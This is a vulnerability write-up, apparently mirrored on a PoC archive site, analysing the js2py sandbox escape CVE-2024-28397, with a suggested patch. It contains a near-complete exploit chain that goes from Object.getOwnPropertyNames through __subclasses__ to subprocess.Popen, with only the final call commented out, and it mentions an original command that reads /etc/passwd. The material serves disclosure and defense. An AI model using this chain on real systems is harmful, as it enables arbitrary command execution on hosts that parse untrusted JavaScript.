POC详情: f52f6b942708c005a5fcd46c98eeacc5790f6cbf

来源
关联漏洞
标题: Js2Py 安全漏洞 (CVE-2024-28397)
描述:Js2Py是Python基金会的一个库。用于将 JavaScript 转换为 Python 代码。 Js2Py 0.74 及之前版本存在安全漏洞,该漏洞源于组件 js2py.disable_pyimport() 中存在一个问题,攻击者利用该漏洞可以通过精心设计的 API 调用执行任意代码。
介绍
# CVE-2024-28397-js2py-Sandbox-Escape

# js2py Vulnerability Analysis

## Introduction


`js2py` is a popular python package that can evaluate javascript code inside the python interpreter. It is used by various web scrapers to parse javascript code on websites.

There exists a vulnerability in the implementation of a global variable inside `js2py`, allowing an attacker to obtain a reference to a python object in the js2py environment, thus enabling the attacker to escape the JS environment and execute arbitrary commands on the host.

Normally, a user would call `js2py.disable_pyimport()` to stop JavaScript code from escaping the `js2py` environment. But with this vulnerability, an attacker can evade this restriction and execute any command on the target host.

The threat actor can host a website containing a malicious JavaScript file or send a malicious script via HTTP API for the victim to parse. By doing that, the actor can achieve remote code execution on the host by executing arbitrary shell commands on the target.

---

## Preface

`js2py` is a Python library commonly used in crawlers, used to parse and execute JS code in a native Python environment. Crawlers generally use `js2py` to parse JS code obtained from the web, thereby simulating the browser environment.

However, `js2py` has a function that is extremely dangerous for crawlers: it supports importing and using Python packages in JS, which means `js2py` allows JS code to manipulate various Python libraries and directly interact with the Python environment. Precisely because of this, we can use a method similar to Jinja SSTI, and in the `js2py` environment use a Python object to find the `subprocess.Popen` class to achieve RCE.

Moreover, since `js2py` is a package from the Python2 era, widely used and long unmaintained, it should be relatively easy to analyze.

---

## Code Analysis

### JS Code to Python Code

After setting breakpoints, it can be found that the place where the JS code is actually parsed is the `Eval` function of `host/jseval.py`. By setting breakpoints in it, you can see the Python code converted by `js2py`.

For example, this piece of JS code:

```js
let a = 114
console.log(a)
```

In the end, will be parsed into this piece of Python code:

```python
var.registers(['a'])
var.put('a', Js(114.0))
EVAL_RESULT = (var.get('console').callprop('log', var.get('a')))
```

It can be seen that variables at the JS layer are all stored in the Python variable `var`. All JS-layer values are cleanly stored as the `PyJs` class (here `Js` is actually a function, explained later). Functions are also called through `callprop`. Under normal circumstances, JS code cannot touch Python objects.

When looking at the code, it was noticed that the author really liked to use string concatenation to construct the final Python code, so the thought arose whether JS code could be constructed to generate illegal Python code, thereby constructing arbitrary Python code and executing it. But considering this path is much more difficult than the later path, it was not further explored.

---

### Python Data to JS Data

To obtain a Python object and implement RCE, the first thing to see, of course, is how Python objects are converted into `PyJs` objects.

First, locate the implementation of the `Js` function, in `base.py`. The role of the `Js` function is to convert the incoming Python value into the corresponding `PyJs` value, thereby allowing JS code to manipulate these values.

```python
def Js(val, Clamped=False):
    '''Converts Py type to PyJs type'''
    if isinstance(val, PyJs):
        return val
    elif val is None:
        return undefined
    elif isinstance(val, basestring):
        return PyJsString(val, StringPrototype)
    elif isinstance(val, bool):
        return true if val else false
    elif isinstance(val, float) or isinstance(val, int) or isinstance(
            val, long) or (NUMPY_AVAILABLE and isinstance(
                val,
                (numpy.int8, numpy.uint8, numpy.int16, numpy.uint16,
                 numpy.int32, numpy.uint32, numpy.float32, numpy.float64))):
        # This is supposed to speed things up. may not be the case
        if val in NUM_BANK:
            return NUM_BANK[val]
        return PyJsNumber(float(val), NumberPrototype)
    ... # several lines omitted here
    else:  # try to convert to js object
        return py_wrap(val)
```

It can be seen that Python’s basic data structures such as bool, float, list, etc. will be converted into dedicated `PyJs` classes, while other types of data will be handled by `py_wrap`, and finally become `PyObjectWrapper` class.

Ordinary `PyJs` classes represent numbers, booleans, and other common data, while `PyObjectWrapper` represents special data such as Python modules. So as long as we obtain a `PyObjectWrapper` type of data, we can use an attribute access method similar to Jinja SSTI to achieve RCE.

Generally speaking, `PyObjectWrapper` type data can only be obtained when the function of importing Python packages is enabled, but because `js2py` is long unmaintained and did not carefully consider the differences between Python2 and Python3, a sandbox escape vulnerability ultimately occurred.

Insert a side note: When looking at the implementation of `PyJs`, I saw the author wrote these lines of code:

```python
if six.PY3:
    PyJs.__hash__ = PyJs._fuck_python3
    PyJs.__truediv__ = PyJs.__div__
```

It can be said that the author extremely dislikes Python3.

---

### JS Function Implementation

While `js2py` provides the function of converting JS code to Python code, it also provides multiple built-in objects such as `console` and `Object` to support the normal running of JS code.

Our ultimate goal is to bypass the restriction of `pyimport` and obtain a `PyObjectWrapper` object. From the analysis above, it can be seen that to get a `PyObjectWrapper` object out of nothing, we can only start from the implementation of built-in objects and extract a `PyObjectWrapper` object from them.

Begin scanning the implementation code of built-in objects. From `constructors/jsobject.py`, you can see the implementation of various functions in the `Object` object, including commonly used functions like `Object.keys`.

Then, you can see this function:

```python
def getOwnPropertyNames(obj):
    if not obj.is_object():
        raise MakeError(
            'TypeError',
            'Object.getOwnPropertyDescriptor called on non-object')
    return obj.own.keys()
```

`js2py` uses `dict` to represent objects in JS. The `keys()` here calls the Python dictionary’s `keys()`. Anyone who has studied Python should know that in Python2, this function returns a list, while in Python3 it returns a `dict_keys` view. According to the above implementation of the `Js` function, this `dict_keys` will be converted into `PyObjectWrapper`, and thus we can achieve RCE.

---

## Achieving RCE

First verify whether `getOwnPropertyNames` can obtain a `PyObjectWrapper`:

```python
import js2py

code = """
let a = Object.getOwnPropertyNames({})
console.log(a)
"""

js2py.eval_js(code)
```

It printed `PyObjectWrapper(dict_keys([]))`, of course it can.

Then, based on this object, we obtain the `__getattribute__` function, and we can easily achieve RCE. When writing the PoC, it was thought of too complicated; actually, just using `__class__.__base__` is enough to obtain the `__getattribute__` function.

Then, based on the `__getattribute__` function, obtain the object object, and then write a recursive function to find any class of any module. Here, for RCE, what is sought is `subprocess.Popen`.

> **NOTE (sanitized):** The code snippet below is shown for educational and research purposes. **It has been sanitized** to avoid facilitating misuse: sensitive shell commands and direct system execution have been replaced with placeholders. Do not run this against production or unpatched systems.

```python
import js2py

code = """
let cmd = "DUMMY_CMD"  # replace with safe test command in a lab (e.g., 'echo test')
let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__
let obj = a(a(a,"__class__"), "__base__")
function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i]
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item
        }
        if(item.__name__ != "type" && (result = findpopen(item))) {
            return result
        }
    }
}
// The next call would invoke subprocess.Popen with arguments — in the sanitized version
// we replace the actual system invocation with a placeholder for safety reasons.
// findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log("[SANITIZED] PoC execution skipped to avoid misuse")
result
"""

# Note: js2py.eval_js(code) intentionally omitted to avoid running exploit code in this repository.
```

---

## Details of the vulnerability

* **Version number of the affected component:**

  * latest js2py (<=0.74) that runs under Python 3
* **Affected products:**

  * [pyload/pyload](https://github.com/pyload/pyload)
  * [VeNoMouS/cloudscraper](https://github.com/VeNoMouS/cloudscraper) (uses js2py as an optional 'js interpreter')
  * [dipu-bd/lightnovel-crawler](https://github.com/dipu-bd/lightnovel-crawler)
* **Steps to reproduce (lab only):**

  * Install Python3 < 3.12 (js2py currently doesn't support Python 3.12).
  * Run `pip install js2py` to install `js2py` and execute a **sanitized** PoC script in an isolated lab environment. The original PoC attempted to run commands like `head -n 1 /etc/passwd` and calculators; in this repo those are replaced with safe placeholders.
  * If the vulnerability exists the researcher will observe that a `PyObjectWrapper` can be obtained from `Object.getOwnPropertyNames({})`, enabling attribute traversal to reach Python internals.

---

## Fix

Since the problem lies in the `getOwnPropertyNames` function, converting the `dict_keys` it returns into a normal list fixes the issue. A suggested patch is to wrap `obj.own.keys()` with `list(...)` before returning.

---

## Disclaimer

This repository is for educational and defensive research purposes only. Do not use any of the information or code here to attack systems without explicit authorization. The PoC snippets have been sanitized to avoid facilitating misuse.

---

*Compiled and translated for research & defensive use.*
文件快照

[4.0K] /data/pocs/f52f6b942708c005a5fcd46c98eeacc5790f6cbf ├── [1.0K] Acknowledgements.md ├── [7.3K] analysis.md ├── [ 464] fix.py ├── [ 34K] LICENSE ├── [ 403] patch.txt ├── [1.2K] Proof of Concept.py └── [ 10K] README.md 0 directories, 7 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。